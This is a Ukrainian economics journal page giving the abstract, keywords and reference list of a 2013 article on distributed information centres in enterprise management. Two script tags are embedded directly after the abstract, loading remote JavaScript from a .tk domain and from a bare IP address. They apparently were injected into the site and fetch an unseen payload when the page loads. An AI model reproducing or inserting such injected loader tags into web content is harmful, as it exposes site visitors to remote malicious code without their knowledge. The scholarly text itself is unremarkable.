ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: 657.01
Управління та інформаційне забезпечення

Розподільчі інформаційні центри у системі інформаційного забезпечення / Мазуренко О.В., Цалко М. М. // Економіка АПК. - 2013. - № 1 - С. 99

Розглянуто проблеми вдосконалення обліково-аналітичного забезпечення виробничого процесу, проведено аналіз теоретичних засад і налагодження інформаційних потоків у діяльності суб’єкта господарювання шляхом створення розподільчих інформаційних центрів з метою підвищення рівня ефективності управління виробництвом. Рис.: 2. Бібліогр.: 5.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключові слова: інформаційне забезпечення, управління, розподільчий інформаційний центр, інформаційні потоки

Список використаних джерел

  1. Авер’яновВ.Б. Державне управління в Україні: навч. посіб. / В.Б.Авер’янов. - К.: Юніверс, 1999. - 432 с.
  2. Годин В.В. Информационное обеспечение управленческой деятельности: учеб. / В.В. Годин, И.К.Корнеев. - М.: Мастерство. Высшая школа, 2001. - 240 с.
  3. Голенищев Э.П. Информационное обеспечение систем управления/ Э.П.Голенищев, И.В.Клименко. - Ростов-на-Дону: Феникс, 2003. - 352 с.
  4. Денисенко М. П. Інформаційне забезпечення інноваційно-інвестиційної діяльності підприємства / М. П. Денисенко, Т. С. Голубєва, І. В. Колос // Вісник Національного університету "Львівська політехніка". - 2009. - № 647. - С. 43-49.
  5. Економічний аналіз: навч. посіб. / [Болюх М. А., Бурчевський В.З., Горбаток М. І. та ін.]; за ред. М. Г. Чумаченка. - К.: КНЕУ, 2001. - 540 с.
Читати статтю: 13_01_15.pdf